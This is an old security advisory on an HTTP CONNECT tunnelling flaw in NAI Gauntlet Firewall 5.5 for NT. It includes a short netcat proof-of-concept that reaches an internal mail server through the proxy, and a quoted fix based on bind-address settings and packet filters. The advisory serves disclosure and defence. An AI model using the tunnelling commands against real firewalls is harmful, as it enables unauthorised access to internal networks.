COMMAND

	NAI Gauntlet Firewall HTTP CONNECT TCP Tunnel Vulnerability

SYSTEMS AFFECTED

	NAI Gauntlet Firewall 5.5 for NT

PROBLEM

	Rashed Alabbar reported that NAI  Gauntlet  Firewall  is  vulnerable  to
	HTTP CONNECT TCP Tunnel Vulnerability when acting as proxy.
	

	See  http://www.securitybugware.org/Other/5112.html  for  details  about
	this vulnerability.
	

	

	

	Client = x.x.x.x

	Gauntlet = y.y.y.y

	Internal Mailserver = z.z.z.z

	

	nc -v -n y.y.y.y 80

	(UNKNOWN) [y.y.y.y] 80 (?) open

	CONNECT z.z.z.z:25 HTTP/1.0

	

	HTTP/1.0 200 OK

	

	mail server banner

	

SOLUTION

	Colin Campbell answered :
	

	It is (or at least I thought it was) well known that an http-gw in  both
	Gauntlet and the fwtk should NEVER listen on the external address. On  a
	Gauntlet system use the bind-address directive to make sure it  doesn\'t
	listen. To be doubly sure set up the appropriate packet filters to  stop
	incoming connections. On a fwtk system I don\'t recall the  bind-address
	directive being present  so  I  always  used  packet  filters  to  block
	incoming connections.
	

	If you must \"reverse proxy\", use plug-gw. Better  still  put  a  proxy
	outside the firewall and plug  it  through  the  firewall  to  the  real
	server.